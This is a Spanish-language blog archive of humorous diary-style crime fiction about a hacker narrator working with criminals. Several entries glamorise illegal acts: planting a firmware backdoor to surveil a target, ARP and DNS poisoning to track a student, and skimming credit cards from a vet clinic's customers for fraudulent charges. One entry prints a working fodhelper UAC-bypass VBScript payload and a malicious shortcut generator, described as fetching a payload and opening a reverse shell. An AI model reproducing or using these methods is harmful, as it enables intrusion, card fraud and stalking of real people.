Archivos de la categoría hacking

6 comentarios

Miércoles, 25 de Julio de 2018: A cazar al cazador

  por , , ,

Querido Diario…

Arribe a Morelia por la mañana, había tenido que salir en el primer vuelo de Mexicali hacía Guadalajara, y de allí tomar un helicóptero hacia Morelia. Antes de eso, pasé a dejar a Shellcode encargada, le compré un bulto grande de croquetas, y sus bocadillos con forma de chuleta que tanto le gustan. Es una buena perra… muy cobarde, pero es una buena perra.

Al llegar al campo de aterrizaje me esperaba Faustino, al quien al bajar salude de forma muy efusiva, teníamos varios meses de no vernos.

- ¿Cómo estas?, ya te hacia muerto en la nieve
- Nah... me dieron unos tehuacanazos con chile piquín por unas 10 horas, pero... nada más. Los güeros no saben nada de nosotros
- Eso escuche, que regresaste como si nada
- ¿Y tú?
- Yo ya no estoy para eso, ya casi tengo cincuenta y... ya va siendo tiempo de quitarnos la medallita de héroes, ahora si, a ganar dinero. Que de todas formas los pen%&/( escogen a quién sea
- Pues si... - rompí el momento emotivo - ¿qué me tienes?
- Con tu hackeo lo ubicamos en sus casas de seguridad y mapeamos su ruta; solamente necesitamos asegurar que va a estar en la ruta, pero fuera de eso creo que lo tenemos
- No podemos simplemente confiar en sus horarios; puede cambiarles en cualquier momento; es muy paranoico. Debemos encontrar una forma de trackearle
- Estamos interceptando algunas cosas que van a su oficina por DHL
- ¿Cómo que cosas? - pregunté
- Cosas normales, papelería, laptops, no sé... podríamos meterle una cámara
- No, eso es muy obvio
- ¿Que tienes en mente?
- ¿Laptops?
- Si
- Vamos a instalarle un juguetito - interrumpí - pero primero, prioridades. Vamos por unas carnitas.

Fuimos a comer a un puestecito cerca de los arcos. Morelia es muy bonito, no dejes de visitarlo en Día de Muertos; y la comida es deliciosa.

Comí con el equipo de Faustino; a pesar de que durante mucho tiempo sirvió a intereses de gente muy poderosa y entreno en diferentes áreas de inteligencia; no le gusta colaborar con mucha gente. Siempre contrata gente de bajo perfil que, básicamente, sólo sabe hacer una cosa. Jalar el gatillo, y hacer pozole con la competencia (espero tú me entiendas cuando digo el término pozole).

Terminando de comer fuimos a su casa de seguridad; bastante fea pero con escondrijos suficientes para entretener un tiempo a un comando armado que entrase y poder sacar a la gente importante. Pasé y me encontré a Mauricio.

Mauricio es prácticamente un niño de 15 años que sacaron de arreglar celulares en la Plaza de la Computación, no tiene talento alguno, pero quiere ser un criminal y aprender; dice que se facilitan estas cosas, pero hum.. ñeee… yo no confiaría mucho mi vida en él.

- ¿Cómo estas vendetta?
- Bien, ¿tú qué tal?, ¿cómo te trata el gordo?
- Bien, bien... estamos aprendiendo
- A ver las manos - le giré su mano derecha con la palma hacia arriba - ¿cuantos?
- Dos, se pusieron difíciles y pues, el señor Faustino me hizo deshacerme de ellos. Ya sabes
- Hum.. a tu edad yo soñaba con grandes cosas, deberías replantearte lo que haces - diablos, ya doy consejos. Estoy viejo.

Mientras intentaba salvar el alma condenada al infierno de Mauricio apareció Faustino.

- ¿Entonces que haremos?
- Dame una de las laptops que interceptaste, la más bonita de todas
- Tengo que Dell, i7, 4 TB, 32 Gb de RAM
- No, no... esa no es
- Es la mejor
- Por eso, esta sólo la usaría un ñoño... esta - y tomé una laptop pequeña
- Pero esta muy chafa - dijo Mauricio
- ¿No la usarías?
- No señor
- Exacto tú eres un nerdo, por eso mismo. Esta es la que usaría él - sentí el corazón de Mauricio partirse en dos, pero... alguien se lo tenía que decir - vamos a instalarle un backdoor pero no con software. Tiene un equipo de seguridad guatemalteco, deserteros de los caibiles, muy bien entrenados. Así que tenemos que ser hábiles. Un backdoor en el firmware
- ¿Y luego?
- Leeremos todo, veremos todo, sabremos to-do
- ¿Nos pueden rastrear?
- Si
- ¿Sabes quién es?
- Si
- No sé si eres muy presumido, eres muy bueno o te quieres morir
- Las tres
- Esta bien, ¿qué necesitamos?
- Abrir la computadora, conectamos este aparatito al BIOS, instalamos el firmware, cerramos, y terminamos - les dije mientras mostraba mi modificador de firmwares (lo siento, es el mejor nombre que se me ocurrió)

- ¿Así de fácil? - preguntó aun dudando Faustino
- Así de fácil 
- ¿En que te ayudamos?
- Bueno, necesito unas manos... las tuyas - le dije a Mauricio - tienes que abrir la computadora por mi
- ¿Por qué? - preguntó
- Ouuuu mis manos son muy suavecitas, no fueron echas para estas cosas
- ¿No?
- No, fueron echas para tomar cosas... 
- ¿Qué cosas?, ¿celulares?
- ¡Ay niño! - mis ojos le dijeron todo a Faustino, Mauricio no iba a durar en este mundo turbio e ilegal - Ten - y le di la computadora - abrela primero y saca ese fierrito de allí que cobre el fierrito de acá

- Bien niño, ahora, conecta el modificador de firmwares a la motherboard
- Si señor
- Si me vuelves a decir señor te meto un tiro en la cabeza
- Si señ... no señ... no vendetta

- Bien, carga el firmware
- ¿Cómo?
- ¿Qué?, ¿nunca has cargado un firmware?
- No señor, pero si me explica lo haré
- ¿Me ves cara de ingeniero?
- Si señor
- Pues no lo soy
- Lo siento señor
- Pues yo no sé cargar un firmware
- ¿Entonces?
- Hay que seguir la metodología

Habiendo resuelto el problema, Mauricio cerró la computadora y la reinició para verificar que todo estuviese bien.

Y estábamos listos.

- Que avanzado - dijo Faustino - ¿qué tan costoso es eso?
- ¿Qué?
- Eso
- ¡Ah! es gratis
- ¿Qué?
- Si, lo descargas de aquí: https://github.com/cr4sh/smmbackdoor

Faustino cerró la computadora y la llevó a la bodega para entregarla al día siguiente como un paquete más de DHL. Después de eso, todo sería cuestión de acción, de la mala.

Me fui al hotel a descansar, esperando lo que pasaría mañana. Pregunté como estaba Shellcode; y me dispuse a ver una película.

Me puse a ver FireFly, es como para la gente que le gusta la ciencia ficción.


Hasta que en algún punto me quedé dormido… y tuve un sueño raro… soñé a Carlos, a Lalo y Lalo 2… es un sueño terrible; que espero que por nuestro bien no sea una premonición.

Que miedo…

Intenté conciliar el sueño, pero no pude. Hasta que de pronto leí un mensaje… y respondí “lo siento, no va a funcionar unos días en Mexicali. Prometo arreglarlo pronto. Espero estes bien y no hayas salido corriendo por el temblor. Te amo, ¡muacks!”.

Me hice bolita y me quedé dormido… por cierto, hay caza recompensas que soy muy crueles. Yo no soy así… creo.

Querido Diario… ¿los perros pueden comer sushi?, Shellcode el otro día, mientras bajé a la cocina por agua, se comió todo el sushi que dejé en el escritorio; no se enfermó, pero no sé si eso está bien.

2 comentarios

Lunes, 9 de Julio de 2018: ¡Chilango!, es tu momento

  por , ,

Querido Diario…

El día de hoy me encontraba realizado tareas altamente importantes, muy ocupado, sin poder si quiera tomar un café de lo atareado.

Cuando al parecer, cierta cachanilla intuyó que en realidad no estaba haciendo nada (cachanillas, todas son iguales).

- Bueno, me llama usted, entonces voy, Don Barredora es quién yo soy - respondí
- Hola terrorista cibernético
- ¿A qué debo el gran honor de su llamada? - si a trabajos me escribe, una llamada me levantó una gran intriga
- Necesito un favor, turbio... de esos que son tu especializada - OMG, no podía creer que había dicho eso.

Me quedé mudo por un momento, pensé y pensé que podía ser. La verdad era que me parecía sorprendente. Jamás habría esperado escuchar esas palabras, así que me preparé para la misión que fuese; no importaba lo compleja. Estaba listo.

- ¿Es en serio? - dije, con gran sorpresa
- Si - me dijo con voz de "baaaah"
- Dame un segundo, no te muevas... - corrí .... - ¡hey!, no te muevas
- Augus... ¡hey! - no le dejé terminar, mientras inmediatamente saqué mi teléfono y pensé en quién podría ser el mejor equipo para esta tarea

Si ella me pedía un favor turbio… ¡OMG!, de verdad tenía que ser muy turbio… ella no pediría esas cosas. Necesita lo mejor de lo mejor… era probable que fuese una de esas misiones en donde hay muertos, gente flotando en ríos de aguas negras, personas partidas a la mitad con coches que corren a sentidos contrarios, rusas violadoras y cosas de ese tipo.

Sin dudarlo, tenía que llamar a la persona más turbia que conozco.

- ¿Ahora que pasó? - respondió con pánico
- Joven, tenemos un problema
- ¡Adíos!, no es mi turno
- ¡Esperaaaaaaa!, esto es importante
- ¿Qué tan importante?
- Mom en persona me lo encargó - mentí
- Demonios... le tengo que avisar a Tania que puede que se vuelva a quedar viuda
- ¿Vuelva?
- Pues es que ya no sé cuantas veces me han estado a punto de matar
- Ahhh.. lo usual joven, lo usual

Estábamos listos… Ahora si, a averiguar que esa lo que pasaba.

- Listo
- ¿Qué hiciste?, ¿fuiste a baño?
- No u.u ... estaba preparando todo para la misión
- <<hahaha>> ... no es tan turbio 
- Hum..¿no?, explícame
- Subieron un comentario feo en una página de Facebook. Al parecer un alumno de mi mamá, y quiere saber quién es
- ¿Es en serio? - dije, con acento cachanillo
- Si
- Ouuu... dame otro minuto
- Augu...

Y volví a marcar…

- Joven
- ¿Qué pasó joven?, ¿donde lo veo?, ¿cómo va a ser la intrusión?, ¿nos van a llevar en helicóptero?, ¿va a haber interrogatorio?, ¿nada más llevo lo básico?, ¿necesitamos algo más avanzado?, ¿granadas?, ¿bazucas?... ¿tafil?
- No, no, no... espera. Aborta la misión que siempre no
- Ohhh... así no se puede joven, ya no hay honor.

Casi al mismo tiempo me empezaron a reclamar con que me iban a cortar una pierna D:

- Listo
- ¿Qué tanto estas haciendo Augusto?
- Nada, nada... ¿qué pasó?
- Pues eso, sólo queremos saber quién hizo ese comentario. ¿Se puede?
- Si
- Bueno, cuando vuelvas entonces lo vemos
- Ahora mismo salgo para allá
- <<Hahaha>> no, cuando vengas
- Ya estoy en camino
- No es cierto, cuando vengas
- Es en serio, estoy saliendo al aeropuerto en este momento
- No te creo nada
- En tres horas veme a buscar al aeropuerto y allí estaré
- No te creo
- ¡De verdaaaaad!

La realidad es que de todas formas yo tenía que volver a casa, así que coincidió… pero, ella jamás lo averiguará 😛

Fui hacia el aeropuerto rumbo a Mexicali, y al llegar… pues si, no estaba allí. Es horrible, porque en Mexicali los taxistas de Uber no aceptan viajes con tarjeta de crédito; cosas raras cachanillas. Después de que me tardé horas muriendo de calor porque en la mañana había llovido, al fin un taxista me recogió. Llegué a casa y deje a Shellcode en casa con el aire acondicionado encendido a todo lo que daba. Y tome mi súper coche no gay para ir a verle.

Me estacioné abajo de su trabajo y empecé a aventar piedritas a la ventana… cosas chilangas que matan de risa a las cachanillas.

- ¡Augusto!, ¿qué haces aquí?
- Vengo a hackear un Facebook o algo así
- Te dije que no era urgente
- Te dije que ya venía en camino
- Bueno, vamos... hoy es el momento en que te perdoné mi mamá
- ¿Qué me perdoné?, pero si no hecho nada malo
- Eres chilango
- ¿Y eso qué?
- Seguro ya harás algo malo
- ¡Hey!

Bien, el asunto es que debíamos de encontrar a la persona que hizo los comentarios. Los cuales los estaba haciendo a horas laborales, lo cual me hizo pensar que tenía que hacerlos desde la escuela y además, lo estaba haciendo en una fan page, lo que lo hacía más fácil de tracear.

La verdad es que el asunto era sencillo, la señora da clases en una universidad muy chiquita llamada CETYS, que en un día arduo no tiene más de 200 alumnos conectados a mismo tiempo; así que iba a ser fácil encontrarle. Primero que nada, necesitaba obtener una dirección IP (como todo en la vida), hubiese utilizado un Apache montado en Kali, pero era el momento de ganar mi perdón; aunque aun no se exactamente porque debo de ganar mi perdón, y lucirme. Tenía que verme muy 1337 hax0r fux0r usando comandos en mi shell negra con letras verdes fluorecentes.

Monté un HTTP server usando netcat:

quesadilla:~ vendetta$ while true ; do echo -e "HTTP/1.1 200 OK\n\n $(date)" | nc -l -p 80 ; done

Entonces monté una imagen referenciada a mi y escribí un post en la fan page con un DNS poisoning hacia el gateway principal de la universidad. Y esperé…

Y esperé…

Y seguí esperando…

Y esperaaaaando….

y después de un <<shorro>> de horas, al fin cayó el tipo 😛

Ya tenía su dirección IP, además de que me di cuenta que toda la universidad estaba en el mismo segmento (¡Ufff… ojalá ESCOM hubiese estado así, ya me vería yo cambiándome las calificaciones). Así que con Cain saqué su MAC. ¿Por qué?, porque tienen DHCP en la red, así que podía ser que se cambiase la IP, y quería estar seguro de tenerlo.

Para eso sólo hay que activar el Sniffer, y luego ir a la pestaña de Network, click derecho y “Scan MAC Addresses” y nos mostrará todos los dispositivos conectados en nuestro mismo segmento. Y voilá

Ya tenía su MAC, ahora podía saber donde estaba en todo momento…

¡Nah!, en Mexicali nadie sabe cambiarse una MAC Address… no había de preocuparse. Lo siguiente era mantener un stalkeo constante del objetivo, y para eso le hice un ARP poisoning, también usando Cain.

Si, lo sé… HTTPS, pero; yo sólo necesitaba ubicarlo, ver en que repetidor estaba y ya.

Y listo, lo tenía… estaba en ese momento en la cafetería que esta junto al cajero.

- Señora, es él
- Hum.. 
- ¿Qué?
- Me lo debí imaginar
- No se preocupe, en la escuela me enseñaron a respetar a mis maestros, deme un segundito; ahorita vengo

- No, no, no... ven para acá chilanguito
- Pero... 
- Shh... 
- Pe... 
- S... 
- Grr... 
- Gracias - en ese momento pensé que me habían perdonado, no sé de que, pero de algo - pero estuvo muy mal, eso no sé hace. Tenías que ser chilango
- ¡Ahhhh! D:

Querido Diario… no entiendo #cachanillas

Que calor… D:

En fin… ya volví

Quisiese saber que dice en español esa canción.

No hay comentarios

Martes, 12 de Junio de 2018: El dulce sonido del dinero

  por ,

Querido Diario…

Vivo en una ciudad extraña donde casi no se usan tarjetas de crédito, Apple Pay, Google Pay, Samsung Pay, PayPal, donde incluso los taxistas de Uber te cancelan el viaje cuando cuando tu forma de pago es en tarjeta o PayPal, porque prefieren ir a perder tiempo en hacer el deposito semanalmente de sus ganancias en lugar de hacer dos o tres viajes en ese periodo de tiempo. Realmente no entiendo porque alguien preferiría hacer eso, pero lo hacen.

Nunca me había molestado mucho, hasta el día de ayer; en el que se me presentó una crisis.

De la nada tenía que viajar a un cierto país caribeño; y necesitaba encontrar el primer vuelo que estuviese disponible. Casi el triple del costo normal, pero había un problema; un problema color café dientes filosos y estomago insaciable.

Debía de llevarle conmigo, sólo que debido a que era un viaje internacional necesitaba un certificado firmado de un veterinario. Ya era algo tarde. así que corrí a toda velocidad al primer sitio. Y, si, no aceptaban tarjeta. Así pasé por varios hasta que llegué a una veterinaria en donde si aceptaban.

Una vez que terminó la revisión, me dijeron el costo y di mi tarjeta. Pero oh, antes de cobrar me dijo el veterinario:

- ¡Ah!, pero si es pago con tarjeta con 16% extra de IVA
- ¿Por qué?
- Por el IVA
- Pero, ¿qué tiene que ver el IVA con que pague con tarjeta? - yo ya sabía la respuesta, pero estaba tan estresado que no podía creerlo
- Porque me cobran a mi el IVA si cobro con tarjeta
- No, le cobran una comisión; que de hecho usted no debiese de cobrarla a sus clientes. Y usted lo firmo cuando contrato su terminal. Si usted me esta cobrando el IVA quiere decir que usted no declara sus impuestos; pero al pagar con tarjeta se ve forzado a hacerlo. Eso se llama ser tranza
- Me insultando señor
- No, le estoy diciendo una verdad incómoda
- Bueno, indistintamente si viene a pagar con tarjeta es porque no tiene dinero
- No, si pago con tarjeta es porque soy civilizado. La tarjeta me genera beneficios, ahorra tiempo y me da un interés de retorno. El efectivo pierde valor a cada segundo
- Pues entonces ya no aceptaré pagos con tarjeta - empezaba a perder el tiempo la compostura frente a sus clientes - y que los muertos de hambre vayan a ver donde
- Ok, suena mal.

El veterinario no se dio cuenta que mientras decía eso dos personas se salieron de su consultorio. Supongo que también pagarían con tarjeta. Pero pensé que realmente el tipo necesitaba una lección. ¿Qué pasaría si todas las tarjetas de su establecimiento presentan cargos no autorizados provenientes de él?. Total, todos serían muertos de hambre.

Primero que nada, necesitaba una forma de cachar las transferencias para ver los datos de las tarjetas, pero con este calor. Iba a ser mortal estar cerca para pinchar la terminal. Así que porque no mejor hacer que mis oídos escuchasen el dulce oido del dinero.

Bueno querido diario, no sé si te haya dicho, que aunque no lo creas fui a la escuela. Y allí lleve algo de electrónica, además trabaje unas semanas en una empresa llamada Skyworks, donde me encargaba básicamente de testear circuitos de transmisión. Era un sitio feo, me encueraban cada que entraba y salía para verificar que no me fuese a robar el oro de los circuitos. No, no es broma.

Primero compré un ATtiny85 para reproducir archivos WAF. ¿Por qué?, porque como no podía pinchar la terminal por el calor, lo que iba a hacer era dejar el dispositivo, capturar todos los datos de tarjeta y robármelos; con una capacidad de robar hasta 250 mil números de tarjeta en un dispositivo.

Para eso me puse a pasar las ondas magnéticas de la banda de la tarjeta en audio: https://salmg.net/2017/01/06/how-to-transmit-mag-stripe-info-through-audio, para ello usé un paper publicado por un amigo llamado Salvador. Si, aunque ya todos usen chip, la banda magnética sigue allí.

Más adelante lo que hice fue armar todo, y ponerle una bobina para poder energizar el circuito.

Y finalmente, necesitaba una forma de poder usarlo… así que le dije a Dania Pelo de Algodón de Azúcar, que le invitaba el baño de su gato. Como puedes ver es muy pequeño, así que lo coloqué en el collar; y el gato estuvo desde el momento de la recepción, al baño, al secado y en la noche pasamos por él. Durante todo el día estuve cachando la información, que luego pasé a un TXT y bualá… no fueron 250 mil tarjetas, pero si cache 39 de clientes muertos de hambre que acudieron a la veterinaria, o pasaron cerca de ella con una tarjeta. Así que empecé a hacer cargos… una licencia premium de YouTubePorn por aquí, una licencia premium de PornoTwitter por acá y así… me gaste unos $10mil por tarjeta.

Obvio la gente pensará que soy mala persona, pero no.. ellos iban a levantar el reporte y se los regresaría. A todas esas personas, lo siento, pero grr… se que pasaron un mal día por mi culpa, pero no es justo que este tipo este robándole a todos nosotros al evadir impuestos. Y finalmente tenía algo preparado para el veterinario. Al parecer es alguien muy muerto de hambre, porque el crédito de su tarjeta era bastante bueno, y pues… yo llevaba tiempo que quería comprar algo, y no me animaba. Pero pues ahora tengo una tarjeta para hacerlo 😛

D: ups.. perdón… este, eso no era… ese fue un coff.. coff.. una compra que hice para despistar a los sistemas anti-fraude.

Y bueno… ahora sólo basta esperar a que las personas reclamen, investiguen y vean que todas las transacciones inválidas están relacionadas a una terminal localizada en esta veterinaria de Av. Macristy, que pues… eludía sus impuestos 😛

Querido Diario.. al final no conseguimos vuelo, y no viaje a ningún sitio. Y además, me cobraron el uso del gato con unos tacos que se llaman El Tasajo, que son muy raros, venían con una brocheta dentro.

No hay comentarios

Martes, 23 de Mayo de 2018: A las malas mujeres siempre las alcanza el karma

  por , ,

Querido diario…

Los días se han vuelto oscuros; he llegado a pensar que el favor está saliendo demasiado caro.

- Ven - me despertó el sonido del celular
- Hum... es de madrugada
- No te pregunté, te lo ordené
- Dice Waze que tardo 30 minutos
- Ve a Polanco, mandaré a mi helicóptero por ti

Mientras viajaba por el cielo de la ciudad me preguntaba por cuanto tiempo resistiría así. No había pasado más de una semana, cuando intentó ofrecerme cualquier cosa que quisiese con tal de irme con ella y dejar a Mom. En forma de broma le pregunté si me cambiaría por Cesar, su lugar teniente y me dejaría a mi; a lo que ella se mofo:

- Cesar es un hombre de negocios, tú sólo eres mi juguete
- Hum... entonces creo que debo de rechazar, junto a Mom coordino las operaciones de una H. Organización Turbia e Ilegal - dije con gran presunción
- Y es justo por eso que mi único interés es en lo que tus manos suaves pueden hacer; no tienes nada que ofrecer. Cesar me genera más beneficios de lo que tu lograras antes de que alguien te mata un tiro en la cabeza. Así que neneco, deja ya de tonterías y acepta para lo único que me sirves.

He de admitir que eso me había dolido, en el ego. Después de esa noche pensé regresar y coordinar a todo lo que estuviese disponible para olvidarnos del trato, y lanzarme contra ella. Ya vería después los problemas que tenemos; en ese momento lo único que quería demostrarle era que no sabía con quién se estaba metiendo.

Pero.. por desgracia cuando intente hacerlo, un #juevesdealitas se nos cruzó.

Debo de admitir que fue una pésima noche de la cual, básicamente no recuerdo nada. Pero; al despertar, después de que un perro llamado Chisco me babease, pude pensar con mayor claridad.

Ok, a quién quiero engañar. Me la pasé ese día todo el tiempo muerto bajo las cobijas. Pero un día más tarde, entonces si; pude pensar con claridad. Y no sólo eso, sabía que debía de hacer algo para demostrarle a esa mala mujer con quién se estaba metiendo. Pos this one.

Dejaría a un lado la tecnología avanzada, o los tehuacanazos; tendría acceso a toda su operación a través de una de las formas más tontas; todo a propósito con tal de demostrarle en donde se quedaba ella y su GRAN Cesar. ¿Mom?, oh si… probablemente no aprobaría esto; pero… como dicen por allí, más vale pedir perdón que permiso.

Lo que hice fue un simple phishing. No puede haber cosa más humillante que recibir el correo del hijo perdido del principe de Nigeria que a través de Hotmail a buscado a miles de personas, hasta que encuentra un alma caritativa que quiere ayudarle a recuperar su herencia. Para ello, primero programe un pequeño template con JSON, el cual sería utilizado para cargar un short cut. ¿Por qué?, bueno; porque hoy en día Microsoft es demasiado complicado de comprometer por estos métodos debido al UAC; incluso si te consigues a una rusa, rubia, güera, alta y pechugona; que te programe un malware y llegas a conseguir que el usuario sea lo suficientemente ingenuo para dar click en ejecutar la pantalla azul gigante de warning de Windows:

Pues la realidad es que el malware se ejecutaría con privilegios del usuario que este usando esa computadora; lo cual usualmente es un usuario no administrador; que no logrará mucho. Pero, ¿un short cut?, todo mundo los usa y con ellos se puede hacer de todo 😛

Esa fue mi razón, primero que nada preparé el JSON… ¡ah! cierto, también use JSON, porque está de moda, en realidad pudo ser simplemente un TXT 😛

{
 "shortcut": {
 "target_path": "C:\\Windows\\System32\\cmd.exe",
 "working_dir": "C:\\Windows\\System32",
 "arguments": "/c notepad.exe",
 "icon_path": "C:\\Windows\\System32\\notepad.exe",
 "icon_index": null,
 "window_style": "MINIMIZED",
 "description": "te voy a jackiar maldita",
 "fake_extension": ".txt",
 "file_name_prefix": "te voy a jackiar maldita"
 },

"elevated_uac": {
 "file_name": "uac_bypass.vbs",
 "cmd": "cmd.exe"
 }
}

Básicamente la idea es lanzas un short cut (.ink) que descargue y ejecute un payload, el servidor remoto entrega el payload que tiene como objetivo bypassear la UAC; se ejecuta, cambia las llaves del registro, abre una conexión y lanza una shell inversa.

Si, hasta un con netstat se podrían dar cuenta que estoy dentro; pero justo era lo que quería; ella sabría que no sólo mis dedos sirve para hacerle grita… digo para jugar domino; también sirve para entrar a computadoras ajenas.

El payload es el siguiente:

Const HKEY_CURRENT_USER = &H80000001

Const FodHelperPath = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName = ""
Const DefaultRegKeyValue = "%s"

Const RegObjectPath = "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv"
Set Registry = GetObject(RegObjectPath)

Registry.CreateKey HKEY_CURRENT_USER, RegKeyPath
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DelegateExecRegKeyName, DelegateExecRegKeyValue
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DefaultRegKeyName, DefaultRegKeyValue

Set Shell = WScript.CreateObject("WScript.Shell")
Shell.Run FodHelperPath, 0, False

¿Qué por qué Visual Basic Script?… grr.. .¿ya mencioné que me quiero burlar de ella haciendole quedar en ridículo?

Y finalmente podemos todo junto en nuestro short cut:

import os
import sys
import argparse
from utils.log import Log
from utils.ioutils import IOUtils
from cmd.cmdstrategy import CommandStrategy
from utils.clihelpformatter import CliHelpFormatter

parser = argparse.ArgumentParser(
 prog="lnk2pwn.py",
 usage="python lnk2pwn.py <options>",
 formatter_class=CliHelpFormatter
)

parser.add_argument(
 "json_config",
 nargs="?",
 help="the shortcut json config"
)

parser.add_argument(
 "-g",
 "--generate",
 action="store_true",
 help="generates a malicious shortcut file(default is True)"
)

parser.add_argument(
 "-c",
 "--config-file",
 metavar="",
 type=argparse.FileType('r'), 
 help="the shortcut config file"
)

parser.add_argument(
 "-o",
 "--output-path",
 metavar="", 
 help="the output path"
)

parser.add_argument(
 "--version",
 action="version",
 version=__version__
)

parser.set_defaults(generate=True)
parser.set_defaults(config_file="config.json")

def main(args):
 """
 Executes the lnk2pwn cli tool
 Parameters
 ----------
 args: Namespace
 The cli arguments
 """

try:

executor = CommandStrategy.resolve(args)
 executor.execute(args)

sys.stdout.close()
 sys.stderr.close()

except KeyError:
 parser.print_help(sys.stderr)
 sys.exit(1)
 
 except ValueError as error:
 Log.error(str(error)) 
 sys.exit(1)

if __name__ == "__main__":

try:

json_config = None

if IOUtils.is_piped_input():
 json_config = IOUtils.read_piped_input()

cli_args = parser.parse_args()
 cli_args.json_config = cli_args.json_config or json_config

main(cli_args)
 
 except KeyboardInterrupt:
 sys.exit(1)

Y lo mandé por correo; y entonces si… me subí a ese helicóptero. Al llegar miré los látigos, el cuero; y ella salir con botas negras.

- Hola
- Hola neneco; te quiero de rodillas
- Antes de eso, quiero decirte algo - lo dije de la forma más sería que pude
- ¿Qué?
- Hable con Mom y creo que podría dejarme ir, pero quiere tener una llamada contigo por Gotomeeting
- ¿Ahora?
- Le dije antes de subir
- Bien, pero la veré en la computadora; odio la señal de 4G

Abrió su computadora, intentó ejecutar el link y no le funcionó; se volteó a mirarme y yo lo único que pude hacer fue inhalar lo más profundo que pude y me le fui a comerle la boca. Le dije que después lo vería con Mom.

Después de cuatro horas salí, con el pretexto de fumar un cigarro. Entonces le marqué a Janey.

- ¡Janey!
- ¡Belindo!
- Dime que si
- Cayó
- Bien
- Oye, pero ¿qué estas haciendo?, dime; eso no se hace; eres un traidor
- Luego hablamos de mi calidad moral; en este momento ya pasó lo más importante. Descarga todo lo que puedas
- Ya
- ¿Ya qué?
- Pues ya
- ¿Y?
 - Creo que mejor te vienes... digo, este, creo que mejor le caes
- [Inserte emoticón pensante aquí]

Se metió con la persona equivocada.

Querido Diario… tengo una canción en el subconsciente y no me la puedo sacar.

Ajá 😛

No hay comentarios

Domingo, 13 de Mayo de 2018: #traición #decepción #deshonor

  por , , , ,

Querido Diario…

Después de llegar al aeropuerto, Mom se perdió entre la multitud para atender sus negocios; mientras yo fui a casa a descansar un poco; y pensar. Sólo me encontré con una solución, y como siempre, actué sin pensar mucho.

Lalo parecía que me estaba esperando, así que lo hice complice de mi pésima idea.

Sentado allí, frente a ella, a su merced; sentía que no había sido la mejor decisión que había tomado, pero ya lo había hecho.

Ella enmarcaba sus rasgos finos con un cabello un tanto despeinado a propósito; vestía un entallado vestido negro no tan corto pero no tan largo, que le hacía ver muy elegante. Lo suficiente para sentirme más intimidado por como se veía, que por sus guardaespaldas bien armados. Mi manía de ver las manos, ella la había pasado; tenía manos delicadas y cuidadas; con un color de uñas sobrio, sin exageraciones. Su perfume era demasiado empalagoso para mi gusto. Sus movimientos eran tan llenos de seguridad que se veían seductores. Tenía mucho tiempo que no había sido intimidado de esa forma; y al  mismo tiempo me daba cierta confianza.

Al entrar su guardaespaldas no me habían desarmado. De todas formas poco habría podido haber hecho frente a esos tipos de dos metros con brazos más grandes que el grosor de mi pierna; portando sus M16.

Desde que habíamos llegado hablamos poco y fuimos al punto; nos sirvieron la comida. Aguachile de habanero, era delicioso; pero no lo estaba disfrutando, me sentía tan intimidado por ella que empecé a cuidar en exceso mis modales, haciéndome muy torpe.

Mientras yo luchaba por clavar un camarón con el trincho, ella rompió mi introversión.

- ¿Entonces?, ¿qué piensas?
- No dijiste que no; sólo dijiste que no pasaría muy rápido
- ¡Que terco eres! - hizo una pausa - eso me gusta de ti
- ¿En serio? - me sorprendió ese comentario - ¿puedes ir a decírselo a mi mamá?, ella opina lo contrario
- ¿Te gusta el mezcal? - me preguntó mientras se sentaba en la silla de mi derecha, y con sus dedos tomó el camarón que tanto se me había escapado y me lo dio en la boca
- No realmente
- Tal vez no has probado uno bueno - y con una mano ordenó que nos fuesen a servir un par de caballitos

Un mesero llegó y nos entrego un par de caballitos y rodajas de naranja con sal de gusano. Eso me asustó más, lo peor que podría pasar es terminar borracho con ella.

Levanto su mano y me hizo una señal de salud para bebernos todo el mezcal de un tiro.

- ¿Y?
- Sigue sin ser mi preferido

Esas palabras notablemente la desilusionaron.

Se acercó a mi, demasiado. Me desabrochó la camisa y desanudo mi corbata. En ese momento no pude distinguir si estaba seduciéndome o me iba a cortar la garganta; pero no me moví en lo más mínimo. Metió su mano y sacó el anillo, lo miró y luego volvió a meterlo entre mis ropas y de un tirón me ajustó la corbata.

- Que bonito gesto

Se levantó y fue ella misma a la barra por la botella. Se sirvió otro caballito de mezcal y empezó a caminar alrededor de la mesa.

- He escuchado un poco de ti, y cuando me dijiste que vendrías ordené que te investigasen. No las cosas que ya todos saben... una investigación un poco más personal
- ¿Y qué tal?
- ¿Cuanto te paga Mom?, yo lo duplicaré
- No estoy aquí por eso, ya sabes lo que quiero
- Y ya te dije que no lo tendrás ni fácil ni pronto; o tal vez ni lo tengas. ¿Por qué estas con él?
- Tenemos un acuerdo 
- ¡Hombres!, y su honor... me aburren. Las mujeres somos mejores en los negocios; no seguimos códigos sin sentido. - hizo una pausa y se acercó dema... suficiente, y me dijo al oido - Dame dos semanas.

Dos horas después bajé y me despedí de la hostess, y caminé tranquilamente hacia donde estaba el coche. Al verme llegar Lalo salió.

- Joven, ¿estas vivo?, ¿cigarro?
- Si, esta vez te lo acepto
- ¿Cómo te fue?
- Bien, creo.. en dos semanas nos ayudarán
- Hum... - empezó a dudar - es mucho tiempo joven. ¿Qué haremos mientras?
- Usar nuestros propios recursos, aun tenemos la carta con Nemux

Mientras estábamos los dos recargados en el coche fumando, le pude ver acercarse a la ventana y hacer un gesto con la mano. Lalo me interrumpió el divage

- Joven, tienes manchado el cuello de la camisa con lápiz labial
- Ouuuu - intenté limpiarme mientras al girar vi la mirada inquisitora de Lalo - ¿qué?
- ¡No!
- No podemos solos
- Joven, eso está muy mal... eso es traición, deshonor... que decepción joven; jamás lo creí de ti. No, no, no... acabas de perder toda credibilidad que tenía en ti; y eso que ni tenías credibilidad.
- A veces hay que hacer lo que hay que hacer
- ¿Y qué tanto hubo que hacer?
- Nada no tan malo
- Oh demonios, joven... 
- ¿Qué?
- ¿Brasileña o afro?, ¿tanga o cachetero?, ¿encaje o algodón?
